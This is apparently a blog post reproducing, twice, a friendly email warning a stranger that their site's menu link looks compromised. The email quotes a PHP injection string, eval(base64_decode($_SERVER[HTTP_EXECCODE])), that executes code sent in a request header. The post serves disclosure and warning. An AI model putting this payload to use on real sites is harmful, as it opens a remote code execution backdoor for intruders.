website princeofswords is glitched
In which I send mail to a total stranger via whois to tell them their site has likely been hit by a drive by exploit
Hi,
I came across your site while searching for OmniGraffle swimlane templates, and hit your post:
http://www.princeofswords.com/2006/08/20/adventures-in-my-macbook-omnigraffle-riva-world/.
While looking around I saw your post about TortoiseSVN and ScPlugin, reachable here:
http://www.princeofswords.com/2008/02/05/tortoisesvn-member/, but the link in your bottom menu points to:
http://www.princeofswords.com/2008/02/05/tortoisesvn-member/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/
This is either glitch in your sites scripts or an attempt to exploit some security misfeatures in the PHP scripting language (It looks a lot like some live
exploit code I have dealt with previously. I suspect your site was attacked and may have been modified without your knowledge!). Either way you should take a look.
Sorry to bother you and I hope this helps. I didn't see any mail address listed on the site, so I used this address from Whois.
hth,
adric
Hi,
I came across your site while searching for OmniGraffle swimlane templates, and hit your post:
http://www.princeofswords.com/2006/08/20/adventures-in-my-macbook-omnigraffle-riva-world/.
While looking around I saw your post about TortoiseSVN and ScPlugin, reachable here:
http://www.princeofswords.com/2008/02/05/tortoisesvn-member/, but the link in your bottom menu points to:
http://www.princeofswords.com/2008/02/05/tortoisesvn-member/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/
This is either glitch in your sites scripts or an attempt to exploit some security misfeatures in the PHP scripting language (It looks a lot like some live
exploit code I have dealt with previously. I suspect your site was attacked and may have been modified without your knowledge!). Either way you should take a look.
Sorry to bother you and I hope this helps. I didn't see any mail address listed on the site, so I used this address from Whois.
hth,
adric